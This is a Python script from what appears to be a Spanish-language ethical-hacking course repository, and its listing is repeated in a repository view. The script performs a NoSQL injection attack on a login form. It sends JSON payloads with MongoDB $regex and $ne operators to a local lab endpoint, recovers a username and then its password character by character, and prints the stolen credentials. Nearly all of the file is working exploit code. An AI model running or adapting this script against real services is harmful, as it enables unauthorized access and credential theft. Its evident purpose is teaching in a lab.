infosec/Introduccion-hacking-hack4u/tema_6_owasp/13_nosqli/nosqli.py

#!/usr/bin/env python
"""
Script para hacer un ataque de fuerza bruta a un login con NoSQL Injection.
Encuentra el primer usuario y su contraseña.
"""

import os
import requests
import signal
import string
import sys
import time

from pwn import *
from termcolor import colored


def def_handler(sig, frame):
    print(colored("\n\n[!] Saliendo...\n", "red"))
    sys.exit(1)


# Ctrl+C
signal.signal(signal.SIGINT, def_handler)


# Variables globales
login_url = "http://localhost:4000/user/login"
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
users_passwords = {}


def makeNoSQLIuser():

    os.system("clear")

    user = ""

    p1 = log.progress(colored("Bruteando user", "magenta"))
    p1.status(colored("Iniciando ataque", "cyan"))

    time.sleep(2)

    p2 = log.progress(colored("User", "magenta"))

    for position in range(0, 30):
        for char in characters:
            post_data = '{"username":{"$regex":"^%s%s"},"password":{"$ne": "admin"}}' % (
                user, char
            )

            p1.status(colored(post_data, "blue"))

            headers = {
                "Content-Type": "application/json"
            }

            r = requests.post(login_url, data=post_data, headers=headers)

            if "Logged in as user" in r.text:
                user += char
                p2.status(colored(user, "green"))
                break

    return user


def makeNoSQLIpass(user):

    os.system("clear")

    password = ""

    p1 = log.progress(colored(f"Bruteando password de {user}", "magenta"))
    p1.status(colored("Iniciando ataque", "cyan"))

    time.sleep(2)

    p2 = log.progress(colored("Password", "magenta"))

    for position in range(0, 50):
        for char in characters:
            user_json = '{"username":"%s","password"' % user
            post_data = user_json + ':{"$regex":"^%s%s"}}' % (
                password, char
            )

            p1.status(colored(post_data, "blue"))

            headers = {
                "Content-Type": "application/json"
            }

            r = requests.post(login_url, data=post_data, headers=headers)

            if "Logged in as user" in r.text:
                password += char
                p2.status(colored(password, "green"))
                break

    return password

if __name__ == '__main__':


    user = makeNoSQLIuser()

    password = makeNoSQLIpass(user)

    users_passwords[user] = password

    os.system("clear")
    time.sleep(1)

    for u, p in users_passwords.items():
        print(colored(f"\n[+] {u}:{p}\n", "green"))
Update tema 6 2024-02-14 02:30:34 +01:00			`#!/usr/bin/env python`
			`"""`
			`Script para hacer un ataque de fuerza bruta a un login con NoSQL Injection.`
			`Encuentra el primer usuario y su contraseña.`
			`"""`

			`import os`
			`import requests`
			`import signal`
			`import string`
			`import sys`
			`import time`

			`from pwn import *`
			`from termcolor import colored`


			`def def_handler(sig, frame):`
			`print(colored("\n\n[!] Saliendo...\n", "red"))`
			`sys.exit(1)`


			`# Ctrl+C`
			`signal.signal(signal.SIGINT, def_handler)`


			`# Variables globales`
			`login_url = "http://localhost:4000/user/login"`
			`characters = string.ascii_lowercase + string.ascii_uppercase + string.digits`
			`users_passwords = {}`


			`def makeNoSQLIuser():`

			`os.system("clear")`

			`user = ""`

			`p1 = log.progress(colored("Bruteando user", "magenta"))`
			`p1.status(colored("Iniciando ataque", "cyan"))`

			`time.sleep(2)`

			`p2 = log.progress(colored("User", "magenta"))`

			`for position in range(0, 30):`
			`for char in characters:`
			`post_data = '{"username":{"$regex":"^%s%s"},"password":{"$ne": "admin"}}' % (`
			`user, char`
			`)`

			`p1.status(colored(post_data, "blue"))`

			`headers = {`
			`"Content-Type": "application/json"`
			`}`

			`r = requests.post(login_url, data=post_data, headers=headers)`

			`if "Logged in as user" in r.text:`
			`user += char`
			`p2.status(colored(user, "green"))`
			`break`

			`return user`


			`def makeNoSQLIpass(user):`

			`os.system("clear")`

			`password = ""`

			`p1 = log.progress(colored(f"Bruteando password de {user}", "magenta"))`
			`p1.status(colored("Iniciando ataque", "cyan"))`

			`time.sleep(2)`

			`p2 = log.progress(colored("Password", "magenta"))`

			`for position in range(0, 50):`
			`for char in characters:`
			`user_json = '{"username":"%s","password"' % user`
			`post_data = user_json + ':{"$regex":"^%s%s"}}' % (`
			`password, char`
			`)`

			`p1.status(colored(post_data, "blue"))`

			`headers = {`
			`"Content-Type": "application/json"`
			`}`

			`r = requests.post(login_url, data=post_data, headers=headers)`

			`if "Logged in as user" in r.text:`
			`password += char`
			`p2.status(colored(password, "green"))`
			`break`

			`return password`

			`if __name__ == '__main__':`



			`user = makeNoSQLIuser()`

			`password = makeNoSQLIpass(user)`

			`users_passwords[user] = password`

			`os.system("clear")`
			`time.sleep(1)`

			`for u, p in users_passwords.items():`
			`print(colored(f"\n[+] {u}:{p}\n", "green"))`